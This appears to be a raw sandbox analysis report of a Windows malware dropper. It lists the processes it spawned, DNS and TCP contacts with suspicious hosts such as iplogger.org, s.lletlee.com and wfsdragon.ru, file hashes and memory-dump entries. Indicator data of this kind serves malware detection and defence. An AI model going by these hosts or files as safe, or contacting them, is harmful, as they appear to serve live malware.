C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 344 -ip 344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 564

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1888 -ip 1888

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 356

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562933 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2192 -ip 2192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 1120

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 25.27.17.104.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
N/A 127.0.0.1:54555 tcp
N/A 127.0.0.1:54557 tcp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe

MD5 25eb7c88cb3002c4029dd7e1aec7f63b
SHA1 cf1bf4283ee16d0a94fc65c82233f9eb69b1db70
SHA256 152b187c8a5d36e4b7f7728a0ac261294790f84b269b6e872ef24d966bcc5ca2
SHA512 f0c627bcb6774253e7c3689265ae30241cb77b45aa0adf0434bb26c173ac43dfd188a6ac7b36a152d1c145afe34a73ea3f765a9892eff0d7b96960d47c58137d

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/344-34-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/1956-99-0x00000000012E0000-0x00000000012E6000-memory.dmp

memory/1956-102-0x00000000012F0000-0x0000000001310000-memory.dmp

memory/1956-103-0x0000000001310000-0x0000000001316000-memory.dmp

memory/2772-97-0x0000000000720000-0x000000000080E000-memory.dmp

memory/1956-96-0x0000000000B30000-0x0000000000B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe

MD5 6cae1487c1ba88b65eead225c280d78c
SHA1 e2624ce9267706b64ee724abe6e7dc8e1dcafd32
SHA256 d3cd0b6963c1b88ff327eee0953c9e30ed3fe4ed7cc198a949b285b626c237d6
SHA512 7bc375e863cc33a7f9c7b24a4c050a73d74a6cc5002713ec1fc3eed8760a8883dd4c7b9f0f3e9c008a71d66b692c4ff8620d574b0f48c0ce531d8f0d4e8fa45a

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe

MD5 7e51418ec90a49b4b6b3ce8e4ba26ba1
SHA1 9cc182ef14b4731d3c45930161afb0ee170d885c
SHA256 50c924e0f3b319b8f66278419f3c0dbd14c1c7d8d33e32d70ee1a959df30d4ae
SHA512 eadb844d9e570bc9339289a2dc4d5d76cc36ada19ff653af9e2a932d1aea083e33bebe65471637ff54e2ac8c36573bbcc243dd617d4391aef53a9fb184f41f7b

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

memory/1184-75-0x00000000008B0000-0x00000000008B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

memory/344-43-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2192-105-0x0000000005580000-0x0000000005B24000-memory.dmp

memory/2192-104-0x0000000000620000-0x0000000000762000-memory.dmp

memory/344-42-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2192-106-0x0000000005070000-0x0000000005102000-memory.dmp

memory/344-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/344-40-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/344-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/344-38-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/344-37-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/344-36-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/344-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/344-33-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/344-32-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/344-30-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/344-26-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2192-107-0x0000000005010000-0x000000000501A000-memory.dmp

memory/2192-108-0x0000000005360000-0x00000000053FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/3872-121-0x00000000001A0000-0x00000000001B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/4604-130-0x0000000002370000-0x0000000002454000-memory.dmp

memory/3756-142-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/344-158-0x0000000064940000-0x0000000064959000-memory.dmp

memory/344-157-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/344-156-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/344-155-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/344-153-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/344-149-0x0000000000400000-0x00000000009D2000-memory.dmp

memory/1888-159-0x0000000000400000-0x0000000002C6E000-memory.dmp

memory/2192-160-0x0000000004910000-0x0000000004922000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/3756-217-0x0000000000930000-0x0000000000A0D000-memory.dmp

memory/1008-223-0x0000000000020000-0x000000000007A000-memory.dmp

memory/2192-226-0x0000000073A30000-0x0000000073A82000-memory.dmp

memory/3756-243-0x00007FFDDB910000-0x00007FFDDB969000-memory.dmp